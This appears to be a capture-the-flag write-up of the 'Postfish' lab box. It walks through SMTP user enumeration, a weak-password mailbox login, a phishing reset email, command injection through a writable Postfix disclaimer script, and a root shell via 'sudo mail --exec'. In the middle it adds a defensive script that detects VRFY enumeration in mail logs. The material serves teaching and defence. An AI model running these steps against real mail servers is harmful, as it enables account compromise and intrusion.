Postfish

I added the IP and hostname to the hosts file for convenience (sudo nano /etc/hosts).

I then ran nmap to see which ports were open.

$ sudo nmap -sC -Pn -p- postfish.offsec
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-21 11:33 EST
Nmap scan report for postfish.offsec (192.168.169.137)
Host is up (0.062s latency).
Not shown: 65528 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
| ssh-hostkey: 
|   3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
|   256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
|_  256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
25/tcp  open  smtp
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2021-01-26T10:26:37
|_Not valid after:  2031-01-24T10:26:37
|_smtp-commands: postfish.off, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
|_ssl-date: TLS randomness does not represent time
80/tcp  open  http
|_http-title: Site doesn't have a title (text/html).
110/tcp open  pop3
|_pop3-capabilities: USER RESP-CODES UIDL TOP CAPA AUTH-RESP-CODE STLS SASL(PLAIN) PIPELINING
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2021-01-26T10:26:37
|_Not valid after:  2031-01-24T10:26:37
|_ssl-date: TLS randomness does not represent time
143/tcp open  imap
|_imap-capabilities: capabilities listed SASL-IR more STARTTLS IMAP4rev1 AUTH=PLAINA0001 IDLE have post-login ID LOGIN-REFERRALS LITERAL+ Pre-login ENABLE OK
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2021-01-26T10:26:37
|_Not valid after:  2031-01-24T10:26:37
|_ssl-date: TLS randomness does not represent time
993/tcp open  imaps
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2021-01-26T10:26:37
|_Not valid after:  2031-01-24T10:26:37
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: capabilities listed ID more IMAP4rev1 AUTH=PLAINA0001 IDLE have post-login LITERAL+ LOGIN-REFERRALS SASL-IR Pre-login ENABLE OK
995/tcp open  pop3s
|_pop3-capabilities: USER CAPA PIPELINING RESP-CODES UIDL SASL(PLAIN) TOP AUTH-RESP-CODE
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2021-01-26T10:26:37
|_Not valid after:  2031-01-24T10:26:37
|_ssl-date: TLS randomness does not represent time

Nmap done: 1 IP address (1 host up) scanned in 54.85 seconds

I noticed a website running on port 80. It does not have much information, but there is a team page. I have seen a couple of instances where text on such a page is related to a user's password, so I created a wordlist from it with cewl.

cewl http://postfish.off/team.html -m 5 -w team.txt

I use this custom wordlist with smtp-user-enum, which checks each candidate name with the SMTP VRFY command, to find valid accounts on the server. This shows us that sales and legal exist.

smtp-user-enum -U team.txt -t postfish.offsec
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... team.txt
Target count ............. 1
Username count ........... 75
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ 

######## Scan started at Tue Dec 21 13:10:39 2021 #########
postfish.offsec: Sales exists
postfish.offsec: Legal exists
######## Scan completed at Tue Dec 21 13:10:42 2021 #########
2 results.

75 queries in 3 seconds (25.0 queries / sec)

I also take the team members' names, generate the common email naming schemes for each, and run that list through smtp-user-enum as well. This confirms the account naming scheme (firstname.lastname).

smtp-user-enum -U users.lst -t postfish.offsec
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... users.lst
Target count ............. 1
Username count ........... 40
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ 

######## Scan started at Tue Dec 21 11:57:31 2021 #########
postfish.offsec: claire.madison exists
postfish.offsec: mike.ross exists
postfish.offsec: brian.moore exists
postfish.offsec: sarah.lorem exists
postfish.offsec: [email protected] exists
postfish.offsec: [email protected] exists
postfish.offsec: [email protected] exists
postfish.offsec: [email protected] exists
######## Scan completed at Tue Dec 21 11:57:33 2021 #########
8 results.

40 queries in 2 seconds (20.0 queries / sec)
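Both enumeration runs above rely on the server answering VRFY truthfully. From the defender's side the same activity is visible in the mail log: Postfix 3.x writes a per-command tally on every smtpd disconnect, so a client that issues dozens of VRFY commands without ever sending a message stands out. The script below is an added example (not part of the original writeup); it runs over constructed log lines in that format, flags such clients, and checks whether main.cf has disable_vrfy_command set, the setting that makes Postfix stop confirming mailboxes. The IPs, PIDs and counts in the sample are made up.

```python
import re
from collections import defaultdict

# Constructed log lines in the shape Postfix 3.x writes to mail.log. On
# disconnect, smtpd logs a per-command tally for the session; a client that
# issues many VRFY commands and never sends mail is enumerating accounts.
SAMPLE_LOG = """\
Dec 21 11:57:31 postfish postfix/smtpd[1199]: connect from unknown[192.0.2.10]
Dec 21 11:57:33 postfish postfix/smtpd[1199]: disconnect from unknown[192.0.2.10] ehlo=1 vrfy=40 quit=1 commands=42
Dec 21 12:30:05 postfish postfix/smtpd[1205]: connect from mail.example.org[203.0.113.5]
Dec 21 12:30:06 postfish postfix/smtpd[1205]: disconnect from mail.example.org[203.0.113.5] ehlo=1 mail=1 rcpt=1 data=1 quit=1 commands=5
Dec 21 13:10:39 postfish postfix/smtpd[1201]: connect from unknown[192.0.2.10]
Dec 21 13:10:42 postfish postfix/smtpd[1201]: disconnect from unknown[192.0.2.10] ehlo=1 vrfy=75 quit=1 commands=77
Dec 21 13:15:00 postfish postfix/smtpd[1210]: disconnect from relay.example.net[198.51.100.7] ehlo=1 vrfy=2 mail=1 rcpt=1 data=1 quit=1 commands=7
"""

DISCONNECT_RE = re.compile(
    r"postfix/smtpd\[\d+\]: disconnect from (?P<host>[^\[\s]+)\[(?P<ip>[^\]]+)\] (?P<counters>.+)$"
)


def parse_disconnects(log_text):
    """Yield (ip, counters) for every smtpd disconnect line, with the
    'name=N' tally turned into a dict of ints."""
    for line in log_text.splitlines():
        m = DISCONNECT_RE.search(line)
        if not m:
            continue
        counters = {}
        for token in m.group("counters").split():
            key, _, value = token.partition("=")
            if value.isdigit():
                counters[key] = int(value)
        yield m.group("ip"), counters


def flag_vrfy_enumeration(log_text, threshold=10):
    """Return {ip: total_vrfy} for clients whose VRFY count across all their
    sessions reaches the threshold while they never started a delivery
    (no MAIL command), the pattern a user-enumeration tool leaves behind."""
    vrfy = defaultdict(int)
    delivered = defaultdict(int)
    for ip, counters in parse_disconnects(log_text):
        vrfy[ip] += counters.get("vrfy", 0)
        delivered[ip] += counters.get("mail", 0)
    return {ip: n for ip, n in vrfy.items() if n >= threshold and delivered[ip] == 0}


def vrfy_disabled(main_cf_text):
    """True when main.cf sets disable_vrfy_command = yes, which makes Postfix
    answer every VRFY with a 252 code instead of confirming or denying a
    mailbox. Comments and blank lines are ignored, as Postfix does."""
    for line in main_cf_text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        key, _, value = line.partition("=")
        if key.strip() == "disable_vrfy_command":
            return value.strip().lower() == "yes"
    return False


if __name__ == "__main__":
    for ip, n in flag_vrfy_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: {n} VRFY commands, nothing delivered -> likely enumeration")
    print("VRFY disabled:", vrfy_disabled("disable_vrfy_command = yes\n"))
```

The threshold is deliberately low: legitimate mail clients almost never send VRFY at all, so even a handful from one address with no accompanying delivery is worth a look. The mitigation check only answers whether the setting is present; the relay in the sample shows why the "no MAIL command" condition matters, since a real sender may issue an occasional VRFY.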

Trying each username as its own password, I find that the sales account has the password sales. Logging in with it, we find an email in the inbox announcing that password reset links will be sent out in the coming week.

curl -k 'imaps://postfish.offsec/INBOX;MAILINDEX=1' --user sales:sales
Return-Path: <[email protected]>
X-Original-To: [email protected]
Delivered-To: [email protected]
Received: by postfish.off (Postfix, from userid 997)
        id B277B45445; Wed, 31 Mar 2021 13:14:34 +0000 (UTC)
Received: from x (localhost [127.0.0.1])
        by postfish.off (Postfix) with SMTP id 7712145434
        for <[email protected]>; Wed, 31 Mar 2021 13:11:23 +0000 (UTC)
Subject: ERP Registration Reminder
Message-Id: <[email protected]>
Date: Wed, 31 Mar 2021 13:11:23 +0000 (UTC)
From: [email protected]

Hi Sales team,

We will be sending out password reset links in the upcoming week so that we can get you registered on the ERP system.

Regards,
IT

We send the user an email containing a link for them to reset their password.

sendemail -t [email protected] -f [email protected] -s postfish.off -u "Password Reset" -o tls=no

We get a callback with the user's password.

We can then log in over SSH as brian.

Running LSE, I notice an unusual file that we have access to (/etc/postfix/disclaimer).

Reading this file and the other files it references, we can work out that they add a disclaimer to the outgoing emails of two accounts ([email protected] and [email protected]). With this information we can try a PoC.

I edit the /etc/postfix/disclaimer file and add the command

/usr/bin/ping -c 1 192.168.169.137

and send an email to [email protected] as we did before. As soon as I do, I get a ping packet on my machine (sudo tcpdump ip proto \\icmp -i tun0)

Using this information, we modify the file once more, replacing the ping with a reverse shell back to our Kali box.

Now we have shell access, but this time as the 'filter' user. Here, sudo -l shows that we can run /usr/bin/mail with sudo.

Looking up 'mail' on GTFOBins, we see how to abuse this command and easily escalate privileges with sudo mail --exec='!/bin/sh'
